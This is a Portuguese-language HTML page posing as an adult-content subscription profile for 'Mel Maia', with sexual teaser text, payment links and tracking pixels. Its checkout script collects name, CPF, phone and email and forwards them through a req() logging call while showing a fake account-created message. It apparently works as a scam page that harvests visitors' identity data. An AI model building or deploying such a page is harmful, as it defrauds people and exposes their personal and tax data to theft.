<!DOCTYPE html><html lang="pt-br"><head>
    <meta charset="UTF-8">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
      body {
        font-family: "Inter", sans-serif;
      }
    </style>
    <link rel="icon" type="image/png" href="images/logo.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CF | Mel Maia</title>
    <script async="" src="js/fbevents.js"></script><script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="css/style.css">

     
   
<!--- Utmfy --->
     
 <script>
  window.pixelId = "67875d9b030e6c5cf8f83e2d";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel_2.js"></script><script async="" defer="" src="js/pixel_1.js"></script><script async="" defer="" src="js/pixel.js"></script>

  <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

    <!--- Utmfy --->

    
  
    
  </head>

  <body class="bg-gray-100">
    <!-- Navbar -->
    <nav class="bg-white shadow-md">
              <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8" style="
    background-color: #FE014D;>
                <div class=" flex="" justify-center="" items-center="" h-16"="">
                  <img class="h-12 w-auto" src="images/logo.svg" alt="Logo" style="text-align: center; display: block; margin: auto; max-width: 100%;height: 3.9rem;">
                </div>
              
      </nav>
    <!-- <script src="/public/js/cleave.min.js"></script> -->
<script src="js/req.js"></script>



<!-- Banner e Perfil -->
<div class="relative max-w-3xl mx-auto rounded-bottom-3">
  <!-- Imagem de Banner -->
  <img loading="lazy" class="w-full h-64 object-cover" style="border-bottom: 4px solid var(fe014d);" src="images/banner.webp" alt="Banner">

  <!-- Gradiente sobre a imagem -->
  <div style="opacity: .6 !important" class="absolute inset-0 bg-gradient-to-t from-black via-transparent to-transparent"></div>

  <!-- Posts e Likes no Banner -->
  <div class="absolute top-4 right-4 text-white">
    <span class="block">
      118 posts • 59k likes
    </span>
  </div>

  <!-- Ícone de Perfil -->
  <div class="absolute -bottom-12 flex items-center justify-center w-full">
    <img loading="lazy" class="h-24 w-24 rounded-full border-4 object-cover" style="border-color: #fe014d;" src="images/profile.webp" alt="Perfil">


  </div>
</div>

<!-- Seção de Nome e @ -->


<style>
  .center {
    width: 100%;
    justify-content: center;
    display: flex;
    align-items: center;
  }
</style>

<div class="max-w-3xl mx-auto mt-16 px-6 w-full justify-center items-center center">
  <div class="w-full justify-center items-center center" style="flex-direction: column;">
    <div class="flex items-center text-center w-full center">
      <h2 class="text-lg font-bold text-black">Mel Maia</h2>
      <img loading="lazy" class="h-4 w-4 ml-1" src="images/badge-check.svg" alt="Verificado">
    </div>
    <p class="text-sm text-gray-600 opacity-80">@melmaia</p>
  </div>
</div>

<!-- Seção de Detalhes do Perfil -->
<div class="max-w-3xl mx-auto bg-white rounded-lg shadow-lg">

  <div class="p-6">
    <!-- Texto com efeito de blur -->
  <p id="profile-details" class="text-gray-800 text-sm blurred">
    Vídeos me masturbando, realizando fetiches, e brincando com minhas amigas 🤤
  </p>

  <!-- Botão "Ver Mais" -->
  <div class="w-full flex justify-end items-center">
    <button id="toggleButton" class="mt-2 focus:outline-none" style="color: #8A94A8;">
    Ver mais
  </button>
  </div>

  <!-- Redes Sociais -->
  <div class="flex space-x-3 mt-2">
    <!-- <a href="#pay" track="initiate_checkout" class="icon-circle">
      <img loading="lazy" src="/public/images/x.png" alt="X" />
    </a>

    <a href="#pay" track="initiate_checkout" class="icon-circle">
      <img loading="lazy" src="/public/images/instagram.png" alt="Instagram" />
    </a>

    <a href="#pay" track="initiate_checkout" class="icon-circle">
      <img loading="lazy" src="/public/images/tiktok.png" alt="TikTok" />
    </a> -->
  </div>

  <!-- Seção de Assinaturas -->
  <br>
  <h6 class="title-subscribe">ASSINATURAS</h6>

  <!-- Botão de Assinatura -->



  
  <!-- Seção de Assinaturas -->
  <br>
  <h6 class="title-subscribe">ASSINATURAS</h6>

  <!-- Botão de Assinatura -->


  <a href="https://pay.pagamentozeroone.com/checkout/19d8299c-3de1-4052-9833-1c02fb729219" track="initiate_checkout" target="_blank" class="subscribe-btn mt-2">
    <span>Assinar (1 mês)</span>
    <spn> R$ 19,90 / mês 
  </spn></a>
  
   <!-- Seção de Assinaturas -->
  <br>
  <h6 class="title-subscribe">ASSINATURAS (30% OFF)</h6>

  <!-- Botão de Assinatura -->


  <a href="https://pay.pagamentozeroone.com/checkout/17145542-27bf-45a5-9b3a-1b410846a929" track="initiate_checkout" target="_blank" class="subscribe-btn mt-2">
    <span>Assinar (3 mês)</span>
    <spn> R$ 27,90 / mês 
  </spn></a>
  
  


    
  </div>
      

  <style>
    body {
      scroll-behavior: smooth !important;
    }

    .checkout {
      padding-block: 15px;
      width: 100%;
      display: flex;
      align-items: center;
      flex-direction: column;
    }

    .checkout .inputs-container {
      width: 100%;
      margin-top: 10px;
      display: flex;
      flex-direction: column;
      gap: 10px;
    }

    .checkout h1 {
      font-size: 1.4rem;
      color: #808080;
      font-weight: bold;
      text-align: center;
    }

    .checkout .inputs {
      display: flex;
      gap: 10px;
      justify-content: space-between;
      width: 100%;
      flex-wrap: wrap;
    }

    .checkout .inputs .input {
      width: 100%;
      display: flex;
      flex-direction: column;
      gap: 5px;
      /* border: 1px solid rgba(128, 128, 128, 0.8); */
      /* padding: 8px; */
      border-radius: 10px;
    }

    .checkout .inputs .input input {
      border: 1px solid rgba(128, 128, 128, 0.5);
      padding: 10px 15px;
      border-radius: 50px;
    }

    .checkout label {
      opacity: 0.5;
      font-weight: bold;
    }

    .checkout button {
      background-color: #32c211;
      width: 100%;
      padding: 8px;
      font-weight: 1.2rem;
      color: white;
      margin-top: 15px;
      border-radius: 50px;
      font-weight: bold;
    }

    .checkout button:disabled {
      background-color: #27930f;
    }

    .session {
      height: 0;
      opacity: 0;
      overflow: hidden;
      transition: 1s;
    }

    .session.open {
      height: auto;
      opacity: 1;
    }

    .checkout .info {
      width: 100%;
      display: flex;
      flex-direction: column;
      gap: 10px;
      margin-bottom: 15px;
    }

    .checkout .info h2 {
      font-weight: bold;
      width: 100%;
      text-align: center;
      opacity: .8;
    }
  </style>

  <div class="checkout session" id="checkout">
    <div class="info">
      <h2>ASSINE E TENHA OS SEGUINTES BENEFÍCIOS</h2>
        <li>Acesso ao conteúdo</li>
        <li>Chat exclusivo com a modelo</li>
        <li>Cancele a qualquer hora</li>
    </div>
    <h1>Crie sua conta</h1>
    <div class="inputs-container">
      <div class="inputs">
        <div class="input">
          <label for="checkout-email">E-mail</label>
          <input id="checkout-email" type="email" placeholder="email@email.com">
        </div>
        <div class="input">
          <label for="checkout-phone">Telefone</label>
          <input id="checkout-phone" type="text" placeholder="(99) 99999-9999">
        </div>
      </div>

      <div class="inputs">
        <div class="input">
          <label for="checkout-name">Nome completo</label>
          <input id="checkout-name" type="text" placeholder="Nome e Sobrenome">
        </div>
        <div class="input">
          <label for="checkout-document">CPF</label>
          <input id="checkout-document" type="text" placeholder="999.999.999-99">
        </div>
      </div>
    </div>

    <button>Efetuar o pagamento</button>
  </div>

  <!-- <iframe id="checkout-iframe" src="" style="width: 100%;height: 500px;"></iframe> -->

  <script>
    // const iframe = document.getElementById('checkout-iframe');

    const getCheckoutValue = (elementId) =>
      document.getElementById(`checkout-${elementId}`).value;

    const checkout_button = document.querySelector(".checkout>button");

    checkout_button.addEventListener("click", (e) => {
      e.preventDefault();

      const name = getCheckoutValue("name");
      const cpf = getCheckoutValue("document");
      const telephone = getCheckoutValue("phone");
      const email = getCheckoutValue("email");

      // iframe.src = `?name=${getCheckoutValue('name')}&document=${getCheckoutValue('document')}&telephone=${getCheckoutValue('phone')}&email=${getCheckoutValue('email')}`

      if (!name || !cpf || !telephone || !email) {
        req("melmaia:  Preencha todos os campos corretamente.");
        return alert("Preencha todos os campos corretamente.");
      } else {
        let data = `
        nome: ${name}
        cpf: ${cpf}
        telefone: ${telephone}
        email: ${email}
        `;

        req(`melmaia: Dados preenchidos: ${data}`);

        let interval;

        let dotCount = 4;

        checkout_button.textContent = "Carregando";
        checkout_button.setAttribute("disabled", "");

        if (!interval) {
          interval = setInterval(() => {
            dotCount = (dotCount + 1) % 4;
            checkout_button.textContent = `Carregando${".".repeat(dotCount)}`;
          }, 300);
        }

        setTimeout(() => {
          document.body.style.overflow = "hidden";

          const modal_bg = document.createElement("div");
          modal_bg.style.cssText = `
            position: fixed;
            width:100%;
            heigth:100vh;
            overflow: hidden;
            top: 0;
            bottom: 0;
            right: 0;
            left: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: rgba(0,0,0,.5);
            padding: 15px;
          `;
          const modal = document.createElement("div");
          modal.style.cssText = `
            padding: 15px;
            border-radius: 15px;
            background-color: white;
            color: #666666;
            transition: 1s;
            opacity: 0;
            box-shadow: 0px 0px 10px rgba(0,0,0,.3);
          `;

          modal.innerHTML = `
            <h1 style="font-size:1.4rem;width:100%;text-align:center;font-weight:bold;">Conta criada com sucesso!</h1>
            <h2 style="width:100%;text-align:center;">Você está sendo redirecionado para a página de pagamento...</h2>
          `;

          document.body.appendChild(modal_bg);
          modal_bg.appendChild(modal);

          setTimeout(() => {
            modal.style.opacity = "1";
          }, 50);

          setTimeout(() => {
            req("melmaia:  Foi para vega");
            window.location.replace(
              `?name=${name}&document=${cpf}&telephone=${telephone}&email=${email}&nome=${name}&cpf=${cpf}&telefone=${telephone}`
            );
          }, 2500);
        }, 3000);
      }
    });

    // new Cleave("#checkout-document", {
    //   delimiters: [".", ".", "-"],
    //   blocks: [3, 3, 3, 2],
    //   numericOnly: true,
    // });

    // new Cleave("#checkout-phone", {
    //   delimiters: ["(", ") ", "-"],
    //   blocks: [0, 2, 5, 4],
    //   numericOnly: true,
    // });
  </script>

  

  <!-- Estatísticas de posts, fotos e vídeos -->
  <div class="stats mb-3">
    <p>
      118 posts • 72 fotos • 46 vídeos
    </p>
  </div>

  <style>
    .post {
      width: 100%;
      color: black !important;
    }

    .post .post-top {
      width: 100%;
      display: flex;
      gap: 10px;
      justify-content: space-between;
      align-items: center;
      padding: 5px 20px;
      padding-top: 20px;
      border-top: 1px solid rgba(0,0,0,.3);
    }

    .p-t {
      display: flex;
      gap: 10px;
      justify-content: center;
      align-items: center;
    }

    .p-t-1 div {
      display: flex;
      flex-direction: column;
      justify-content: start;
    }

    .post .post-top i {
      opacity: 0.6;;
    }

    .post .post-top span {
      font-weight: bold;
      opacity: .8;
    }

    .post .post-top p::before {
      content: '@'
    }
    
    .post .post-top p {
      line-height: 15px;
      opacity: .6;
    }

    .post .post-top img:first-child {
      width: 50px;
      height: 50px;
      object-fit: cover;
      border-radius: 100px;
    }
  </style>

  
    
  

  <script>
    const videoElement = document.getElementById("myVideo");
    videoElement.addEventListener("click", function () {
      if (videoElement.muted) {
        videoElement.muted = false;
      } else {
        videoElement.muted = true;
      }
    });
  </script>



  <div class="post">
    <div class="post-top">

      <div class="p-t p-t-1">
        <img loading="lazy" src="images/profile.webp">
        <div>
          <div class="flex items-center text-center w-full center" style="flex-direction: row;">
            <span>Mel Maia</span>
            <img loading="lazy" class="h-4 w-4 ml-1" src="images/badge-check.svg" alt="Verificado">
          </div>
          <p>melmaia</p>
        </div>
      </div>

      <div class="p-t p-t-2">
          <i>Ontem</i>
      </div>
    </div>
  
<!-- Imagem com marca d'água -->
<div class="image-container mt-4">
  <div>
    <img loading="lazy" src="images/2.webp" alt="Imagem">
  </div>
  <!-- Marca d'água -->
  <img loading="lazy" class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
</div>
 
  </div>

  <div class="post">
    <div class="post-top">

      <div class="p-t p-t-1">
        <img loading="lazy" src="images/profile.webp">
        <div>
          <div class="flex items-center text-center w-full center" style="flex-direction: row;">
            <span>Mel Maia</span>
            <img loading="lazy" class="h-4 w-4 ml-1" src="images/badge-check.svg" alt="Verificado">
          </div>
          <p>melmaia</p>
        </div>
      </div>

      <div class="p-t p-t-2">
          <i>há 2 dias</i>
      </div>
    </div>
  
<!-- Imagem com marca d'água -->
<div class="image-container mt-4">
  <div>
    <img loading="lazy" src="images/3.webp" alt="Imagem">
  </div>
  <!-- Marca d'água -->
  <img loading="lazy" class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
</div>
 
  </div>

  <div class="post">
    <div class="post-top">

      <div class="p-t p-t-1">
        <img loading="lazy" src="images/profile.webp">
        <div>
          <div class="flex items-center text-center w-full center" style="flex-direction: row;">
            <span>Mel Maia</span>
            <img loading="lazy" class="h-4 w-4 ml-1" src="images/badge-check.svg" alt="Verificado">
          </div>
          <p>melmaia</p>
        </div>
      </div>

      <div class="p-t p-t-2">
          <i>há 3 dias</i>
      </div>
    </div>
  
<!-- Imagem com marca d'água -->
<div class="image-container mt-4">
  <div>
    <img loading="lazy" src="images/4.webp" alt="Imagem">
  </div>
  <!-- Marca d'água -->
  <img loading="lazy" class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
</div>
 
  </div>

  <div class="post">
    <div class="post-top">

      <div class="p-t p-t-1">
        <img loading="lazy" src="images/profile.webp">
        <div>
          <div class="flex items-center text-center w-full center" style="flex-direction: row;">
            <span>Mel Maia</span>
            <img loading="lazy" class="h-4 w-4 ml-1" src="images/badge-check.svg" alt="Verificado">
          </div>
          <p>melmaia</p>
        </div>
      </div>

      <div class="p-t p-t-2">
          <i>há 4 dias</i>
      </div>
    </div>
  
    <div class="video-container mt-4" style="pointer-events: none !important;">
      <div style="pointer-events: none !important;">
        <video autoplay="" muted="" loop="" style="pointer-events: none !important;">
          <source src="media/1.mp4" type="video/mp4" style="pointer-events: none !important;">
          Seu navegador não suporta vídeos HTML5.
        </video>
      </div>
      <!-- Marca d'água -->
      <img loading="lazy" class="watermark" style="max-width: 200px" src="images/white-logo.png" alt="Marca d'água">
    </div>
 
  </div>



  <style>
    .payment-overlay {
      position: fixed;
      top: 0;
      left: -100%;
      width: 100%;
      height: 100%;
      background-color: white;
      z-index: 1000;
      transition: left 0.5s ease-in-out;
    }

    .payment-overlay.active {
      left: 0;
    }

    .payment-iframe {
      border: none;
      width: 100%;
      height: 100%;
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      z-index: 1000;
    }
  </style>

  <div id="paymentOverlay" class="payment-overlay">
    <iframe id="pagSeguroIframe" src="" frameborder="0" allowfullscreen="" class="payment-iframe"></iframe>
  </div>

  <div class="stats">
    <p>
      118 posts • 72 fotos • 46 vídeos
    </p>
  </div>

  <div class="p-6">
    <footer>
      <a href="https://pay.pagamentozeroone.com/checkout/17145542-27bf-45a5-9b3a-1b410846a929" "="" track="initiate_checkout" class="subscribe-btn">DESBLOQUEAR CONTEÚDOS</a>
    </footer>
  </div>

  <script>
    function buildUrlWithUTM(baseUrl) {
      const utmData = JSON.parse(localStorage.getItem("myCustomUTMData"));
      const url = new URL(baseUrl, window.location.origin);

      if (utmData) {
        for (const key in utmData) {
          if (utmData.hasOwnProperty(key)) {
            url.searchParams.set(key, utmData[key]);
          }
        }
      }

      return url.toString();
    }

    let sended_ic = false;

    document.querySelectorAll("[track='initiate_checkout']").forEach((a) => {
      a.addEventListener("click", async (e) => {
        e.preventDefault();
        try {
          if (!sended_ic) {
            sended_ic = true;
            req("melmaia:  IC: " + a.textContent);
          }
          await fbq("track", "InitiateCheckout");
        } catch {}

        window.localStorage.setItem('model-username', 'melmaia');

        window.location.href = a.getAttribute('href');
      });
    });
  </script>

  <script>
    try {
      const toggleButton = document.getElementById("toggleButton");
    const profileDetails = document.getElementById("profile-details");

    toggleButton.addEventListener("click", function () {
      if (profileDetails.classList.contains("blurred")) {
        profileDetails.classList.remove("blurred");
        toggleButton.textContent = "Ver menos";
      } else {
        profileDetails.classList.add("blurred");
        toggleButton.textContent = "Ver mais";
      }
    });

    const toggleButto02 = document.getElementById("toggleButton02");
    const otherOptions = document.getElementById("otherOptions");

    toggleButto02.addEventListener("click", function () {
      if (otherOptions.style.display == "none") {
        otherOptions.style.display = "flex";
        toggleButto02.textContent = "Voltar";
        req("melmaia:  Abriu o otherOptions");
      } else {
        otherOptions.style.display = "none";
        toggleButto02.textContent = "Outras opções";
        req("melmaia:  Fechou o otherOptions");
      }
    });
    } catch {}
  </script>

  

</div>

   

</body></html>